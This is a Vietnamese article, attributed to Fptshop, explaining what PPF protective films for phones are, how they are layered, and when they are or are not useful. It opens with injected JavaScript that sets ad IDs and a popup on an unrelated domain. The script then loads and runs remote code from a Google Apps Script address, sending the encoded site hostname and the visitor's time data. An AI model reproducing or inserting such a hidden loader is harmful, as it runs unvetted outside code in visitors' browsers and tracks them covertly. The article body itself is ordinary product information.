var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Miếng dán PPF là gì? Miếng dán PPF có thật sự tốt? – Fptshop.com.vn

Miếng dán PPF là gì?

PPF là viết tắt cho Paint Protection Film, đây là một loại film được sử dụng để bảo vệ lớp sơn cho xe hơn. Với những ưu điểm như mỏng, trong suốt, linh hoạt, độ bền khá tốt, giá rẻ, PPF dần được sử dụng rộng rãi trong nhiều lĩnh vực hơn trong đó bao gồm việc bảo vệ cho các thiết bị công nghệ như điện thoại, máy tính bảng…

Miếng dán PPF là gì 1

Miếng dán PPF vốn được sử dụng cho xe hơi từ lâu

Miếng dán PPF thường có hai loại trong và nhám. Loại trong suốt đôi khi sẽ được sử dụng dán màn hình, hoặc bạn muốn trông chiếc điện thoại mình tự nhiên nhất. Với miếng dán nhám thì nó sẽ giúp hạn chế bám vân tay.

Cấu tạo của miếng dán PPF

Một miếng dán PPF tiêu chuẩn thường có cấu tạo 4 lớp bao gồm:

  • Lớp lót (PET Protective Cap Sheet): Đây là một lớp mảng mỏng nhằm bảo vệ miếng dán khi vận chuyển, bảo quản. Sau khi dán lên máy thì lớp lót này sẽ được lột ra.
  • Lớp nền (TPU Base Film): Đây là lớp bảo vệ chính với khả năng chống xước ổn, có thể chịu nhiệt và tia UV.
  • Lớp keo (Adhesive): Lớp keo trong suốt nhằm kết dính lớp nền với bề mặt điện thoại, tablet.
  • Màng phủ (Liner): Lớp bảo vệ keo, khi dán chúng ta sẽ lột lớp này ra.

Như vậy, trong 4 lớp cấu tạo nên miếng dán PPF thì thực tế chỉ có hai lớp bên trong chúng ta sẽ sử dụng, hai lớp bên ngoài đóng vai trò là lớp bảo vệ. Những loại PPF cao cấp hơn có thể sẽ có thêm một lớp bảo vệ bên ngoài lớp nền nữa thường được gọi là lớp coat.

Cấu tạo miếng PPF

Miếng dán PPF có thật sự tốt

Miếng dán PPF có tốt hay không thì còn tùy thuộc vào cách mà bạn sử dụng.

Miếng dán PPF có thật sự tốt 1

Miếng dán PPF sẽ tốt trong trường hợp:

  • Bạn không muốn sử dụng ốp lưng nhưng muốn bảo vệ được mặt lưng cũng như cạnh viền
  • Chống bám vân tay khi bạn không sử dụng ốp lưng (nếu bạn chọn dán nhám)
  • Dù đã xài ốp lưng, nhưng việc tháo ra tháo vô hoặc cát lọt có thể làm trầy điện thoại, một miếng dán PPF sẽ khắc phục được điều đó

Miếng dán PPF có thật sự tốt 2

Miếng dán PPF sẽ không tốt trong trường hợp:

  • Dán màn hình: Bản thân miếng dán PPF không được thiết kế để có một bề mặt trơn, mượt cho việc cảm ứng, nó cũng không được thiết kế để giữ nguyên chất lượng hiển thị cho màn hình. Vì vậy nếu muốn bảo vệ màn hình bạn vẫn nên chọn những loại film chuyên dụng hoặc kính cường lực.
  • Nếu bạn muốn bảo vệ điện thoại khỏi rơi rớt: Miếng dán PPF rất mỏng, nó chỉ hấp thụ được một lượng rất nhỏ chấn động nên hầu như không có khả năng bảo vệ điện thoại khi rơi rớt. Một chiếc ốp lưng dù giá rẻ vẫn an toàn hơn so với miếng dán PPF.

Miếng dán PPF có thật sự tốt 3

Mua miếng dán PPF ở đâu

Miếng dán PPF hiện tại được bán khá phổ biến tại các cửa hàng phụ kiện, sàn thương mại điện tử… với nhiều mẫu mã đa dạng. Nếu điện thoại của bạn không có mẫu sẵn, một số nơi còn có thể cắt bằng máy tính theo yêu cầu.

Tuy nhiên, miếng dán PPF có độ đàn hồi khá cao và có thể sẽ bị lệch một số vị trí (như loa, micro…). Nếu thực sự cần dán thì bạn nên mang máy đến trực tiếp những nơi bán. Sau khi dán xong bạn cần kiểm tra các vị trí micro, loa, nếu bị che thì bạn cần yêu cầu dán lại.